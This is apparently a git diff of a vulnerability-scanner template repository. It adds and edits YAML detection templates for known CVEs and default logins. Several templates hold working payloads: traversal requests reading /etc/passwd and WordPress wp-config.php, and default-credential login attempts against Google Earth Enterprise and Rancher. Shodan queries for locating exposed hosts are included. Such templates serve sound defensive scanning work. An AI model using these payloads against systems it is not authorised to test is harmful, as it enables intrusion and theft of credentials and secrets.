diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index 276fbcff83..cd23caa054 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml @@ -4,7 +4,7 @@ info: name: Zoho manageengine Arbitrary Reflected XSS author: pikpikcu severity: medium - description: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. + description: A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. reference: - https://github.com/unh3x/just4cve/issues/10 - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml new file mode 100644 index 0000000000..2273074039 --- /dev/null +++ b/cves/2021/CVE-2021-40978.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-40978 + +info: + name: mkdocs 1.2.2 built-in dev-server allows directory traversal + author: pikpikcu + severity: high + reference: + - https://github.com/nisdn/CVE-2021-40978 + - https://nvd.nist.gov/vuln/detail/CVE-2021-40978 + tags: cve,cve2021,mkdocs,lfi + description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1." + +requests: + - method: GET + path: + - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0:" + part: body + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/ecoa-building-lfi.yaml b/cves/2021/CVE-2021-41291.yaml similarity index 59% rename from vulnerabilities/other/ecoa-building-lfi.yaml rename to cves/2021/CVE-2021-41291.yaml index fcaa63183d..b0e8b161ea 100644 --- a/vulnerabilities/other/ecoa-building-lfi.yaml +++ b/cves/2021/CVE-2021-41291.yaml @@ -1,12 +1,19 @@ -id: ecoa-building-lfi +id: CVE-2021-41291 info: name: ECOA Building Automation System - Directory Traversal Content Disclosure author: gy741 severity: high description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php - tags: ecoa,lfi + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php + - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html + tags: cve,cve2021,ecoa,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-41291 + cwe-id: CWE-22 requests: - raw: @@ -17,5 +24,4 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0:" - part: body + - "root:.*:0:0:" \ No newline at end of file diff --git a/cves/2021/CVE-2021-41293.yaml b/cves/2021/CVE-2021-41293.yaml new file mode 100644 index 0000000000..4a4c48e176 --- /dev/null +++ b/cves/2021/CVE-2021-41293.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-41293 + +info: + name: ECOA Building Automation System - LFD + author: 0x_Akoko + severity: high + description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php + - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html + tags: cve,cve2021,ecoa,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-41293 + cwe-id: CWE-22 + +requests: + - raw: + - | + POST /viewlog.jsp HTTP/1.1 + Host: {{Hostname}} + + yr=2021&mh=6&fname=../../../../../../../../etc/passwd + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index e82bbd6bef..473c7adbcb 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -3,7 +3,7 @@ id: CVE-2021-41773 info: name: Apache 2.4.49 - Path Traversal and Remote Code Execution author: daffainfo - severity: critical + severity: high description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. reference: - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 @@ -12,6 +12,13 @@ info: - https://twitter.com/h4x0r_dz/status/1445401960371429381 - https://github.com/blasty/CVE-2021-41773 tags: cve,cve2021,lfi,rce,apache,misconfig + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-41773 + cwe-id: CWE-22 + metadata: + shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49 requests: - raw: @@ -37,4 +44,4 @@ requests: - type: word name: RCE words: - - "CVE-2021-41773" \ No newline at end of file + - "CVE-2021-41773" diff --git a/default-logins/google/google-earth-dlogin.yaml b/default-logins/google/google-earth-dlogin.yaml new file mode 100644 index 0000000000..9826c42eb0 --- /dev/null +++ b/default-logins/google/google-earth-dlogin.yaml @@ -0,0 +1,37 @@ +id: google-earth-dlogin + +info: + name: Google Earth Enterprise Default Login + author: orpheus,johnjhacking + severity: high + tags: default-login,google + reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html + metadata: + shodan-dork: 'title:"GEE Server"' + +requests: + - raw: + - | + GET /admin/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + attack: pitchfork + payloads: + username: + - geapacheuser + + password: + - geeadmin + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + condition: and + words: + - 'DashboardPanel' + - 'Earth Enterprise Server' \ No newline at end of file diff --git a/default-logins/rancher/rancher-default-login.yaml b/default-logins/rancher/rancher-default-login.yaml new file mode 100644 index 0000000000..9eadc6d68c --- /dev/null +++ b/default-logins/rancher/rancher-default-login.yaml @@ -0,0 +1,52 @@ +id: rancher-default-login + +info: + name: Rancher Default Login + author: princechaddha + severity: high + description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes. + reference: https://github.com/rancher/rancher + tags: default-login,rancher,kubernetes,devops,cloud + +requests: + - raw: + - | + GET /v3/settings/first-login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 + + - | + POST /v3-public/localProviders/local?action=login HTTP/1.1 + Host: {{Hostname}} + Cookie: CSRF={{csrf}} + X-Api-Csrf: {{csrf}} + Connection: close + Content-Length: 136 + + {"username":"{{username}}","password":"{{password}}","description":"UI Session","responseType":"cookie","labels":{"ui-session":"true"}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'R_SESS=token' + part: header + + extractors: + - type: regex + name: csrf + group: 1 + internal: true + part: header + regex: + - 'Set-Cookie: CSRF=([a-z0-9]+)' diff --git a/exposed-panels/netscalar-aaa-login.yaml b/exposed-panels/netscaler-aaa-login.yaml similarity index 84% rename from exposed-panels/netscalar-aaa-login.yaml rename to exposed-panels/netscaler-aaa-login.yaml index 1f8c66d7b3..c0b77f5fc7 100644 --- a/exposed-panels/netscalar-aaa-login.yaml +++ b/exposed-panels/netscaler-aaa-login.yaml @@ -1,7 +1,7 @@ -id: netscalar-aaa-login +id: netscaler-aaa-login info: - name: NetScalar AAA Login Panel + name: NetScaler AAA Login Panel author: dhiyaneshDk severity: info reference: https://www.exploit-db.com/ghdb/6898 diff --git a/exposed-panels/rancher-panel.yaml b/exposed-panels/rancher-panel.yaml new file mode 100644 index 0000000000..f7eae0a56f --- /dev/null +++ b/exposed-panels/rancher-panel.yaml @@ -0,0 +1,34 @@ +id: rancher-panel + +info: + name: Rancher Login Panel + author: princechaddha + severity: info + description: Rancher is a open-source multi-cluster orchestration platform, lets operations teams deploy, manage and secure enterprise Kubernetes. + reference: https://github.com/rancher/rancher + tags: panel,rancher,kubernetes,devops,cloud + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Loading…" + - "global-admin/config/environment" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '' diff --git a/misconfiguration/hpe-system-management-anonymous.yaml b/misconfiguration/hpe-system-management-anonymous.yaml new file mode 100644 index 0000000000..13b5e6706b --- /dev/null +++ b/misconfiguration/hpe-system-management-anonymous.yaml @@ -0,0 +1,21 @@ +id: hpe-system-management-anonymous-access + +info: + name: HPE System Management Anonymous Access + author: divya_mudgal + severity: low + tags: hp,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/chpstrt.php?chppath=Home" + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - "username = \"hpsmh_anonymous\";" + - "var host_addr = '" + - "var ip_addr = '" \ No newline at end of file diff --git a/technologies/confluence-detect.yaml b/technologies/confluence-detect.yaml index 168a3b1f53..ba239b67f4 100644 --- a/technologies/confluence-detect.yaml +++ b/technologies/confluence-detect.yaml @@ -5,7 +5,9 @@ info: author: philippedelteil severity: info description: Allows you to detect Atlassian Confluence instances - tags: tech,confluence + tags: tech,confluence,atlassian + metadata: + shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22 requests: - method: GET diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml index a8bb4d5847..0c1f84d566 100644 --- a/token-spray/iterable.yaml +++ b/token-spray/iterable.yaml @@ -20,3 +20,4 @@ requests: negative: true words: - 'BadApiKey' + - 'RateLimitExceeded' # Matchers needs to be replaced with valid +ve match instead of -ve diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index 4b8022a318..b56424baca 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -4,12 +4,12 @@ info: name: Bitrix Open URL redirect detection author: pikpikcu severity: low + description: The Bitrix Russia Site Management 2.0 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html tags: redirect,bitrix requests: - method: GET - path: - '{{BaseURL}}/bitrix/rk.php?goto=https://example.com' - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com' @@ -33,7 +33,7 @@ requests: part: header - type: status + condition: or status: - 302 - - 301 - condition: or + - 301 \ No newline at end of file diff --git a/vulnerabilities/other/commax-biometric-auth-bypass.yaml b/vulnerabilities/other/commax-biometric-auth-bypass.yaml index dfdc0ae4a8..dd820dfb22 100644 --- a/vulnerabilities/other/commax-biometric-auth-bypass.yaml +++ b/vulnerabilities/other/commax-biometric-auth-bypass.yaml @@ -4,7 +4,7 @@ info: name: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass author: gy741 severity: critical - description: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. + description: The COMMAX Biometric Access Control System suffers from an authentication bypass vulnerability. An unauthenticated attacker through cookie poisoning can bypass authentication and disclose sensitive information and circumvent physical controls in smart homes and buildings. reference: - https://www.exploit-db.com/exploits/50206 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php diff --git a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml index c03a8be40a..16884d7384 100644 --- a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml +++ b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml @@ -4,6 +4,7 @@ info: name: DedeCmsV5.6 Carbuyaction Fileinclude author: pikpikcu severity: high + description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter. reference: https://www.cnblogs.com/milantgh/p/3615986.html tags: dedecms diff --git a/vulnerabilities/other/dedecms-membergroup-sqli.yaml b/vulnerabilities/other/dedecms-membergroup-sqli.yaml index 4100d95baa..1adc04596d 100644 --- a/vulnerabilities/other/dedecms-membergroup-sqli.yaml +++ b/vulnerabilities/other/dedecms-membergroup-sqli.yaml @@ -4,6 +4,7 @@ info: name: DedeCMS Membergroup SQLI author: pikpikcu severity: medium + description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter. reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html tags: sqli,dedecms diff --git a/vulnerabilities/other/ecoa-building-automation-lfd.yaml b/vulnerabilities/other/ecoa-building-automation-lfd.yaml deleted file mode 100644 index 24d0554968..0000000000 --- a/vulnerabilities/other/ecoa-building-automation-lfd.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: ecoa-building-automation-lfd -info: - name: ECOA Building Automation System - LFD - author: 0x_Akoko - severity: high - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php - tags: ecoa,lfi - -requests: - - raw: - - | - POST /viewlog.jsp HTTP/1.1 - Host: {{Hostname}} - - yr=2021&mh=6&fname=../../../../../../../../etc/passwd - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - condition: and - - - type: status - status: - - 200 diff --git a/vulnerabilities/other/fatpipe-backdoor.yaml b/vulnerabilities/other/fatpipe-backdoor.yaml index dd1ccac475..98e6e53d22 100644 --- a/vulnerabilities/other/fatpipe-backdoor.yaml +++ b/vulnerabilities/other/fatpipe-backdoor.yaml @@ -4,7 +4,7 @@ info: name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account author: gy741 severity: high - description: The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. + description: FatPipe Networks has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php - https://www.fatpipeinc.com/support/advisories.php diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml index 8e4768db23..c0e7dbfcad 100644 --- a/vulnerabilities/other/geovision-geowebserver-lfi.yaml +++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -4,7 +4,8 @@ info: name: GeoVision Geowebserver 5.3.3 - LFI author: madrobot severity: high - reference: https://www.exploit-db.com/exploits/50211 + description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. + reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,lfi requests: diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml index f9c3d234be..a047ed5e8b 100644 --- a/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -4,7 +4,8 @@ info: name: GeoVision Geowebserver 5.3.3 - XSS author: madrobot severity: medium - reference: https://www.exploit-db.com/exploits/50211 + description: GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. + reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,xss requests: diff --git a/vulnerabilities/other/h3c-imc-rce.yaml b/vulnerabilities/other/h3c-imc-rce.yaml index 470a86869d..2c0133a076 100644 --- a/vulnerabilities/other/h3c-imc-rce.yaml +++ b/vulnerabilities/other/h3c-imc-rce.yaml @@ -1,9 +1,10 @@ id: h3c-imc-rce info: - name: H3c IMC Rce + name: H3c IMC RCE author: pikpikcu severity: critical + description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw tags: rce,h3c-imc diff --git a/vulnerabilities/other/hasura-graphql-psql-exec.yaml b/vulnerabilities/other/hasura-graphql-psql-exec.yaml index 98bcfbc283..00d5756dd4 100644 --- a/vulnerabilities/other/hasura-graphql-psql-exec.yaml +++ b/vulnerabilities/other/hasura-graphql-psql-exec.yaml @@ -4,6 +4,7 @@ info: author: Udyz name: Hasura GraphQL Engine - postgresql query exec severity: critical + description: A vulnerability in Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint. reference: https://www.exploit-db.com/exploits/49802 tags: hasura,rce diff --git a/vulnerabilities/other/hiboss-rce.yaml b/vulnerabilities/other/hiboss-rce.yaml index 6765dc8577..10df9f9c37 100644 --- a/vulnerabilities/other/hiboss-rce.yaml +++ b/vulnerabilities/other/hiboss-rce.yaml @@ -4,6 +4,7 @@ info: name: Hiboss RCE author: pikpikcu severity: critical + description: A vulnerability in HiBoss allows remote unauthenticated attackers to cause the server to execute arbitrary code via the 'server_ping.php' endpoint and the 'ip' parameter. reference: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?btwaf=40088994 tags: hiboss,rce diff --git a/vulnerabilities/other/karel-ip-phone-lfi.yaml b/vulnerabilities/other/karel-ip-phone-lfi.yaml index 8d8787781f..d2ca25b0c4 100644 --- a/vulnerabilities/other/karel-ip-phone-lfi.yaml +++ b/vulnerabilities/other/karel-ip-phone-lfi.yaml @@ -4,6 +4,7 @@ info: name: Karel IP Phone IP1211 Web Management Panel - Directory Traversal author: 0x_Akoko severity: high + description: A vulnerability in the Karel IP Phone IP1211 Web Management Panel allows remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter. reference: - https://cxsecurity.com/issue/WLB-2020100038 - https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon diff --git a/vulnerabilities/other/netis-info-leak.yaml b/vulnerabilities/other/netis-info-leak.yaml index 9cfa7fac56..bb9688eb93 100644 --- a/vulnerabilities/other/netis-info-leak.yaml +++ b/vulnerabilities/other/netis-info-leak.yaml @@ -5,6 +5,7 @@ info: author: gy741 severity: medium reference: https://www.exploit-db.com/exploits/48384 + description: A vulnerability in Netis allows remote unauthenticated users to disclose the WiFi password of the remote device. tags: netis,exposure requests: diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index 05bb45755f..efc4f25bce 100644 --- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -4,6 +4,7 @@ info: name: Nginx Merge Slashes Path Traversal author: dhiyaneshDk severity: medium + description: A vulnerability in the remote Nginx server could cause the server to merge slashslash together causing what should have protected the web site from a directory traversal vulnerability into a vulnerable server. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d diff --git a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml index c6e5e91adf..f2584939c4 100644 --- a/vulnerabilities/other/opensis-lfi.yaml +++ b/vulnerabilities/other/opensis-lfi.yaml @@ -4,9 +4,9 @@ info: name: openSIS 5.1 - 'ajax.php' Local File Inclusion author: pikpikcu severity: high + description: An attacker can exploit a vulnerability in openSIS to obtain potentially sensitive information and execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible. reference: - https://www.exploit-db.com/exploits/38039 - - https://www.securityfocus.com/bid/56598/info tags: opensis,lfi requests: diff --git a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml index de51dfbd25..27dc936559 100644 --- a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml +++ b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml @@ -4,6 +4,7 @@ info: name: WordPress Attitude Themes 1.1.1 Open Redirection author: 0x_Akoko severity: low + description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it. reference: https://cxsecurity.com/issue/WLB-2020030185 tags: wordpress,wp-theme,redirect diff --git a/vulnerabilities/wordpress/brandfolder-lfi.yaml b/vulnerabilities/wordpress/brandfolder-lfi.yaml index 54d3abbe1b..2cb1f03bf0 100644 --- a/vulnerabilities/wordpress/brandfolder-lfi.yaml +++ b/vulnerabilities/wordpress/brandfolder-lfi.yaml @@ -4,6 +4,7 @@ info: name: Wordpress brandfolder plugin - RFI & LFI author: 0x_Akoko severity: high + description: A vulnerability in WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content. reference: - https://www.exploit-db.com/exploits/39591 - https://cxsecurity.com/issue/WLB-2016030120 diff --git a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml index 5811edcd94..ddc524d0fc 100644 --- a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml +++ b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml @@ -1,9 +1,10 @@ id: brandfolder-open-redirect info: - name: Wordpress brandfolder plugin Open Redirect + name: WordPress Brandfolder Plugin Open Redirect author: 0x_Akoko severity: low + description: A vulnerability in WordPress Brandfolder allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it. reference: https://www.exploit-db.com/exploits/39591 tags: wordpress,wp-plugin,lfi,rfi diff --git a/vulnerabilities/wordpress/cherry-file-download.yaml b/vulnerabilities/wordpress/cherry-file-download.yaml new file mode 100644 index 0000000000..3597e4d780 --- /dev/null +++ b/vulnerabilities/wordpress/cherry-file-download.yaml @@ -0,0 +1,29 @@ +id: cherry-file-download + +info: + name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download + author: 0x_Akoko + severity: high + description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. + reference: + - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee + - https://github.com/CherryFramework/cherry-plugin + tags: wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/issuu-panel-lfi.yaml b/vulnerabilities/wordpress/issuu-panel-lfi.yaml index 079a043e95..d2ecd930f2 100644 --- a/vulnerabilities/wordpress/issuu-panel-lfi.yaml +++ b/vulnerabilities/wordpress/issuu-panel-lfi.yaml @@ -4,6 +4,7 @@ info: name: Wordpress Plugin Issuu Panel - RFI & LFI author: 0x_Akoko severity: high + description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files. reference: https://cxsecurity.com/issue/WLB-2016030131 tags: wp-plugin,wordpress,lfi,rfi